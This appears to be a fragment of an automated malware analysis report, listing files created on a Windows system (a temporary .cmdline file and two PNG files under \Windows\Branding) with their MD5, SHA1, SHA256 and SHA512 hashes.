  SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.cmdline
  MD5: 04ed560c0f1794390e4fd54ae7acf985
  SHA1: 29387bbea3bcbc12a55274d6331dce68431f592f
  SHA256: 0af1da3715122acebbd553e146f89551fe5ed2a75342eaa76b0354d300839497
  SHA512: ad4cb56438d379ef84f07093ede7e10c50b7926df9400268befec913cf2c16e9b4d014e7177cb2650ef36bd76f15970505dc017dfacc2aa938d7d302d86cfcbc
-
\Windows\Branding\mediasrv.png
  MD5: f357d4e7b83bc0a41c65d97f3e6f50f4
  SHA1: 71db3180a8ada6d5d7722c54a5940c3490f78636
  SHA256: db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
  SHA512: 566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.png
  MD5: d5de6f599d9807bac2f5a8e751a8c38f
  SHA1: 9e70edf56b6a5768fda84232e9c557e750d3631b
  SHA256: 18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
  SHA512: e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5